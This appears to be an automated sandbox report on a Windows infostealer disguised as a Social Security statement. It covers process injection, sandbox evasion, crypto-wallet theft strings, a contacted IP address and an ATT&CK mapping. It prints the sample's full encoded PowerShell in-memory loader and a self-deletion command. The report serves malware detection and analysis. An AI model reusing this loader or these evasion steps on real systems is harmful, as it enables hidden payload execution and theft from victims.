              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F58055000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:Microsoft|VMWare|Virtual
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F58055000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F58055000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|Xen
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F58055000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0Microsoft|VMWare|Virtual
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F58055000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWare
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F58055000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
              Source: wscript.exe, 00000000.00000003.1469171373.000002574F817000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1469537188.000002574FC8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1468667647.000002574F3A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1468302066.0000025750524000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1431699876.000002574FA54000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1432855244.000002574FECD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 Zeddysmf Gtikez Gqeof Cqxqrtpnjfp Ekufqtforw Kwxqjlzqgwc Ymrfzepk Wwyymgjktm Xswzup Ihfrrgoi Vlvabulmn Jctrpziz Ncnoqhgfsas Lwrcohc Wycxaqozt Ytmmddghrw Kkftigl Mqqnj Dbzuvksje Auvteqr Xgshdyygvv Asovtnpanj
              Source: Social_Security_Statement_Review.vbsBinary or memory string: ' Wwbpva Tetzucxjk Wsuynbm Munet Qaimqyr Dbvtpe Hyncyo Bwdyqpf Hicksxbat Rfoio Vyismvdocnv Vmcivdvp
              Source: InstallUtil.exe, 00000010.00000002.2741937099.000001ADCA64B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\\
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 58000 value starts with: 4D5AJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeThread register set: target process: 5236Jump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 58000Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 5A000Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: B0000Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: B2000Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 88E686010Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe" -enc JABWAGkAaAB3AHgAaQBrAHQAZwBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAEgAZwB3AHIAYgBjAGkAegBoAGsAIAA9ACAAZwBlAHQALQBjAG8AbgB0AGUAbgB0ACAAJABWAGkAaAB3AHgAaQBrAHQAZwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEgAZwB3AHIAYgBjAGkAegBoAGsALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEMAbwB4AG0AYgB4AG4AZgB0AGgAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAKQA7ACQATwB2AGoAbQBhACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABIAHgAYgB6AGgAbQB5AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAQwBvAHgAbQBiAHgAbgBmAHQAaAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQASAB4AGIAegBoAG0AeQB0AC4AQwBvAHAAeQBUAG8AKAAgACQATwB2AGoAbQBhACAAKQA7ACQASAB4AGIAegBoAG0AeQB0AC4AQwBsAG8AcwBlACgAKQA7ACQAQwBvAHgAbQBiAHgAbgBmAHQAaAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAPQAgACQATwB2AGoAbQBhAC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABLAGkAaABqAGoAaQBkAG4AeQApADsAIAAkAEwAdABnAHQAegB6AHEAYwB1AHYAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABLAGkAaABqAGoAaQBkAG4AeQApADsAIAAkAFUAaABmAGwAdgAgAD0AIAAkAEwAdABnAHQAegB6AHEAYwB1AHYALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABVAGgAZgBsAHYALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFUAaABmAGwAdgAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\user\Desktop\Social_Security_Statement_Review.vbs' -ForceJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe "c:\users\user\desktop\social_security_statement_review.vbs.exe" -enc jabwagkaaab3ahgaaqbrahqazwbuacaapqagafsauwb5ahmadablag0algbeagkayqbnag4abwbzahqaaqbjahmalgbqahiabwbjaguacwbzaf0aoga6aecazqb0aemadqbyahiazqbuahqauabyag8aywblahmacwaoackalgbnageaaqbuae0abwbkahuabablac4argbpagwazqboageabqblac4augblahaababhagmazqaoaccalgblahgazqanacwajwanackaowakaegazwb3ahiaygbjagkaegboagsaiaa9acaazwblahqalqbjag8abgb0aguabgb0acaajabwagkaaab3ahgaaqbrahqazwbuacaafaagafmazqbsaguaywb0ac0atwbiagoazqbjahqaiaataewayqbzahqaiaaxadsaiaakaesaaqboagoaagbpagqabgb5acaapqagafsauwb5ahmadablag0algbdag8abgb2aguacgb0af0aoga6aeyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaakaegazwb3ahiaygbjagkaegboagsalgbsaguacabsageaywblacgajwbsaeuatqagaccalaagaccajwapac4augblahaababhagmazqaoaccaqaanacwaiaanaeeajwapackaowakaemabwb4ag0aygb4ag4azgb0aggaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakaesaaqboagoaagbpagqabgb5acaakqa7acqatwb2agoabqbhacaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauae0azqbtag8acgb5afmadabyaguayqbtadsajabiahgaygb6aggabqb5ahqaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4aqwbvag0acabyaguacwbzagkabwbuac4arwb6agkacabtahqacgblageabqagacqaqwbvahgabqbiahgabgbmahqaaaasacaakabbaekatwauaemabwbtahaacgblahmacwbpag8abgauaemabwbtahaacgblahmacwbpag8abgbnag8azablaf0aoga6aeqazqbjag8abqbwahiazqbzahmakqa7acqasab4agiaegboag0aeqb0ac4aqwbvahaaeqbuag8akaagacqatwb2agoabqbhacaakqa7acqasab4agiaegboag0aeqb0ac4aqwbsag8acwblacgakqa7acqaqwbvahgabqbiahgabgbmahqaaaauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakaesaaqboagoaagbpagqabgb5acaapqagacqatwb2agoabqbhac4avabvaeeacgbyageaeqaoackaowbbaeeacgbyageaeqbdadoaogbsaguadgblahiacwblacgajablagkaaabqagoaaqbkag4aeqapadsaiaakaewadabnahqaegb6aheaywb1ahyaiaa9acaawwbtahkacwb0aguabqauaeeacabwaeqabwbtageaaqbuaf0aoga6aemadqbyahiazqbuahqarabvag0ayqbpag4algbmag8ayqbkacgajablagkaaabqagoaaqbkag4aeqapadsaiaakafuaaabmagwadgagad0aiaakaewadabnahqaegb6aheaywb1ahyalgbfag4adabyahkauabvagkabgb0adsaiabbafmaeqbzahqazqbtac4arablagwazqbnageadablaf0aoga6aemacgblageadablaeqazqbsaguazwbhahqazqaoafsaqqbjahqaaqbvag4axqasacaajabvaggazgbsahyalgbeaguaywbsageacgbpag4azwbuahkacablacwaiaakafuaaabmagwadgauae4ayqbtaguakqauaeqaeqbuageabqbpagmasqbuahyabwbraguakaapacaafaagae8adqb0ac0atgb1agwabaa=
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe "c:\users\user\desktop\social_security_statement_review.vbs.exe" -enc jabwagkaaab3ahgaaqbrahqazwbuacaapqagafsauwb5ahmadablag0algbeagkayqbnag4abwbzahqaaqbjahmalgbqahiabwbjaguacwbzaf0aoga6aecazqb0aemadqbyahiazqbuahqauabyag8aywblahmacwaoackalgbnageaaqbuae0abwbkahuabablac4argbpagwazqboageabqblac4augblahaababhagmazqaoaccalgblahgazqanacwajwanackaowakaegazwb3ahiaygbjagkaegboagsaiaa9acaazwblahqalqbjag8abgb0aguabgb0acaajabwagkaaab3ahgaaqbrahqazwbuacaafaagafmazqbsaguaywb0ac0atwbiagoazqbjahqaiaataewayqbzahqaiaaxadsaiaakaesaaqboagoaagbpagqabgb5acaapqagafsauwb5ahmadablag0algbdag8abgb2aguacgb0af0aoga6aeyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaakaegazwb3ahiaygbjagkaegboagsalgbsaguacabsageaywblacgajwbsaeuatqagaccalaagaccajwapac4augblahaababhagmazqaoaccaqaanacwaiaanaeeajwapackaowakaemabwb4ag0aygb4ag4azgb0aggaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakaesaaqboagoaagbpagqabgb5acaakqa7acqatwb2agoabqbhacaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauae0azqbtag8acgb5afmadabyaguayqbtadsajabiahgaygb6aggabqb5ahqaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4aqwbvag0acabyaguacwbzagkabwbuac4arwb6agkacabtahqacgblageabqagacqaqwbvahgabqbiahgabgbmahqaaaasacaakabbaekatwauaemabwbtahaacgblahmacwbpag8abgauaemabwbtahaacgblahmacwbpag8abgbnag8azablaf0aoga6aeqazqbjag8abqbwahiazqbzahmakqa7acqasab4agiaegboag0aeqb0ac4aqwbvahaaeqbuag8akaagacqatwb2agoabqbhacaakqa7acqasab4agiaegboag0aeqb0ac4aqwbsag8acwblacgakqa7acqaqwbvahgabqbiahgabgbmahqaaaauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakaesaaqboagoaagbpagqabgb5acaapqagacqatwb2agoabqbhac4avabvaeeacgbyageaeqaoackaowbbaeeacgbyageaeqbdadoaogbsaguadgblahiacwblacgajablagkaaabqagoaaqbkag4aeqapadsaiaakaewadabnahqaegb6aheaywb1ahyaiaa9acaawwbtahkacwb0aguabqauaeeacabwaeqabwbtageaaqbuaf0aoga6aemadqbyahiazqbuahqarabvag0ayqbpag4algbmag8ayqbkacgajablagkaaabqagoaaqbkag4aeqapadsaiaakafuaaabmagwadgagad0aiaakaewadabnahqaegb6aheaywb1ahyalgbfag4adabyahkauabvagkabgb0adsaiabbafmaeqbzahqazqbtac4arablagwazqbnageadablaf0aoga6aemacgblageadablaeqazqbsaguazwbhahqazqaoafsaqqbjahqaaqbvag4axqasacaajabvaggazgbsahyalgbeaguaywbsageacgbpag4azwbuahkacablacwaiaakafuaaabmagwadgauae4ayqbtaguakqauaeqaeqbuageabqbpagmasqbuahyabwbraguakaapacaafaagae8adqb0ac0atgb1agwabaa=Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: InstallUtil.exe, 00000010.00000002.2719376474.000001ADB1F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: InstallUtil.exe, 00000010.00000002.2719376474.000001ADB1F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty@fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: InstallUtil.exe, 00000010.00000002.2719376474.000001ADB1F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus Web3@jiidiaalihmmhddjgbnbgdfflelocpak
              Source: InstallUtil.exe, 00000010.00000002.2719376474.000001ADB1F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information21
              Scripting              		Valid Accounts131
              Windows Management Instrumentation              		21
              Scripting              		311
              Process Injection              		1
              Masquerading              		OS Credential Dumping1
              Query Registry              		Remote Services11
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		LSASS Memory121
              Security Software Discovery              		Remote Desktop Protocol1
              Data from Local System              		1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)51
              Virtualization/Sandbox Evasion              		Security Account Manager1
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              PowerShell              		Login HookLogin Hook311
              Process Injection              		NTDS51
              Virtualization/Sandbox Evasion              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Application Window Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Obfuscated Files or Information              		Cached Domain Credentials2
              File and Directory Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Software Packing              		DCSync33
              System Information Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Timestomp              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              DLL Side-Loading              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              File Deletion              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1511959 Sample: Social_Security_Statement_R... Startdate: 16/09/2024 Architecture: WINDOWS Score: 100 35 Malicious sample detected (through community Yara rule) 2->35 37 .NET source code contains potential unpacker 2->37 39 .NET source code contains method to dynamically call methods (often used by packers) 2->39 41 4 other signatures 2->41 8 wscript.exe 1 2->8         started        process3 signatures4 47 Malicious encrypted Powershell command line found 8->47 49 Very long command line found 8->49 51 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->51 53 2 other signatures 8->53 11 Social_Security_Statement_Review.vbs.exe 17 8->11         started        14 cmd.exe 2 8->14         started        process5 file6 55 Found many strings related to Crypto-Wallets (likely being stolen) 11->55 57 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->57 59 Writes to foreign memory regions 11->59 63 5 other signatures 11->63 17 InstallUtil.exe 2 11->17         started        21 powershell.exe 13 11->21         started        23 conhost.exe 11->23         started        27 7 other processes 11->27 31 Social_Security_Statement_Review.vbs.exe, PE32+ 14->31 dropped 61 Renames powershell.exe to bypass HIPS 14->61 25 conhost.exe 14->25         started        signatures7 process8 dnsIp9 33 176.150.119.15, 49709, 49712, 49713 BOUYGTEL-ISPFR France 17->33 43 Found many strings related to Crypto-Wallets (likely being stolen) 17->43 45 Deletes itself after installation 21->45 29 conhost.exe 21->29         started        signatures10 process11

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Social_Security_Statement_Review.vbs3%ReversingLabs

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
              https://stackoverflow.com/q/14436606/233540%Avira URL Cloudsafe
              https://stackoverflow.com/q/2152978/233540%Avira URL Cloudsafe
              https://github.com/mgravell/protobuf-neti0%Avira URL Cloudsafe
              https://github.com/mgravell/protobuf-netJ0%Avira URL Cloudsafe
              https://stackoverflow.com/q/11564914/23354;0%Avira URL Cloudsafe
              https://stackoverflow.com/q/2152978/23354rCannot0%Avira URL Cloudsafe
              https://github.com/mgravell/protobuf-net0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
